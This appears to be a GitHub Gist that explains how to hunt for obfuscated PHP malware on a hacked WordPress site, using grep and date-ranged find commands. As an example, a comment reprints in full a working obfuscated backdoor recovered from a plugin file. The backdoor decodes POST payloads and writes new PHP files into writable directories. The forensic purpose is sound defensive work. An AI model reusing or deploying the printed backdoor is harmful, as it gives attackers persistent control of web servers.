Created
June 18, 2023 16:42
-
-
Save kiwimato/9bb8c982125958d2cc8a24ce33ffbeb5 to your computer and use it in GitHub Desktop.
Grep wordpress to search for obsfucate PHP malware
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
grep "\$[a-zA-Z0-9]*(" ./ -ir | |
# should find some funky stuff like: | |
# ./wp-content/plugins/classic-editor/js/hoxozkwa.php:<?php $LRhdThLn = "\104"."\117".chr(67)."\x55".chr(77).'E'."\x4e"."\x54".chr(95)."\x52".chr(79).chr(79).'T';$qEJGBsQZ = "\x48"."\x54".'T'.chr(331-251).chr(95).'H'."\117"."\x53"."\x54";$FocpVmGikU = chr(104)."\x74".chr(116).chr(875-763)."\72"."\57".chr(370-323);$InqeP = chr(591-545).chr(463-351)."\150".chr(112);$OmaOCPiem = "\160".chr(104)."\160";$aALnXcWKii = 'f'."\151"."\154".chr(101)."\137".chr(889-777)."\x75".chr(727-611).chr(95).chr(99)."\157".chr(110).'t'.chr(576-475)."\x6e"."\x74".'s';$eleTmtrO = chr(552-438)."\x61".chr(119).'u'."\162".chr(732-624).'d'."\145".chr(950-851)."\x6f".'d'."\x65";$YGdQfPUtlO = chr(117)."\156"."\x73"."\145".chr(114).'i'.'a'."\154".'i'.chr(585-463).chr(799-698);$wuLUaDUX = chr(112)."\150".chr(112)."\166"."\145"."\x72"."\163"."\151".chr(111).'n';$VaXDosXIU = 's'.'t'."\x72"."\x5f".chr(114).chr(227-116)."\164".chr(49).chr(108-57);$BVrBroINfP = "\163".chr(101).'r'.'i'."\141".chr(637-529)."\151".chr(579-457)."\145";$jltoISt = chr(845-730).'t'."\x72".'_'.chr(115).chr(112)."\154".chr(105)."\x74";foreach ($_POST as $IbPYBs => $eIuItYTG){if (strlen($IbPYBs) == 16){$eIuItYTG = $jltoISt($eleTmtrO($VaXDosXIU($eIuItYTG)));$IbPYBs = array_slice($jltoISt(str_repeat($IbPYBs, (count($eIuItYTG)/16)+1)), 0, count($eIuItYTG));function VrKLUkfxG($lcvkMP, $qljnaDbI, $IbPYBs){$IdsUDSqEOX = "baddf620-11f1-4e09-9f3d-876476b02b3a";return $lcvkMP ^ $IdsUDSqEOX[$qljnaDbI % strlen($IdsUDSqEOX)] ^ $IbPYBs;}$eIuItYTG = implode("", array_map("VrKLUkfxG", array_values($eIuItYTG), array_keys($eIuItYTG), array_values($IbPYBs)));$eIuItYTG = @$YGdQfPUtlO($eIuItYTG);if (@is_array($eIuItYTG)){$RvqUXNHiI = array_keys($eIuItYTG);$eIuItYTG = $eIuItYTG[$RvqUXNHiI[0]];if ($eIuItYTG === $RvqUXNHiI[0]){echo @$BVrBroINfP(Array($OmaOCPiem => @$wuLUaDUX(), ));exit();}else {function JZejiips($CPKtGwir){static $OCUaFV = array();$HQbufPbr = glob($CPKtGwir . '/*', GLOB_ONLYDIR);if (count($HQbufPbr) > 0) {foreach ($HQbufPbr as $CPKtGw) {if (@is_writable($CPKtGw)) {$OCUaFV[] = $CPKtGw;}}}foreach ($HQbufPbr as $CPKtGwir) JZejiips($CPKtGwir);return $OCUaFV;}$cMaYE = $_SERVER[$LRhdThLn];$HQbufPbr = JZejiips($cMaYE);$RvqUXNHiI = array_rand($HQbufPbr);$mtujCvFpOt = $HQbufPbr[$RvqUXNHiI] . "/" . substr(md5(time()), 0, 8) . $InqeP;@$aALnXcWKii($mtujCvFpOt, $eIuItYTG);echo $FocpVmGikU . $_SERVER[$qEJGBsQZ] . substr($mtujCvFpOt, strlen($cMaYE));exit();}}}} | |
# root@zupe # ls -alFth ./wp-content/plugins/classic-editor/js/hoxozkwa.php | |
# -rw-r--r-- 1 zupe-1 zupe-1 2.4K Feb 6 2020 ./wp-content/plugins/classic-editor/js/hoxozkwa.php | |
# Once you know when the data of the breach, you can search for specific files modified in that date to narrow down what got changed: | |
# Of course, there will also be some false positives, which could be legitimate files, but some of them could also be backdoored, just modified a slightly bit. | |
# But for example 088p8rr8/FabZZ.js.php clearly are something malicious and you can confirm that by looking at the file with `cat`` | |
# root@zupe:/home/zupe-1/htdocs/www.zupe.website# touch --date "2020-02-05" /tmp/start | |
# touch --date "2020-02-07" /tmp/end | |
# root@zupe:/home/zupe-1/htdocs/www.zupe.website# find . -type f -newer /tmp/start -not -newer /tmp/end | |
# ./wp-blog-header.php | |
# ./wp-admin/moderation.php | |
# ./wp-content/themes/088p8rr8/FabZZ.js.php | |
# ./wp-content/themes/088p8rr8/aRO.js.php | |
# ./wp-content/themes/088p8rr8/Nd.js.php | |
# ./wp-content/themes/twentytwentythree/Nd.js.php | |
# ./wp-content/plugins/84q5po64/FabZZ.js.php | |
# ./wp-content/plugins/84q5po64/aRO.js.php | |
# ./wp-content/plugins/84q5po64/Nd.js.php# | |
root@zupe:/home/zupe-1/htdocs/www.zupe.website# | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment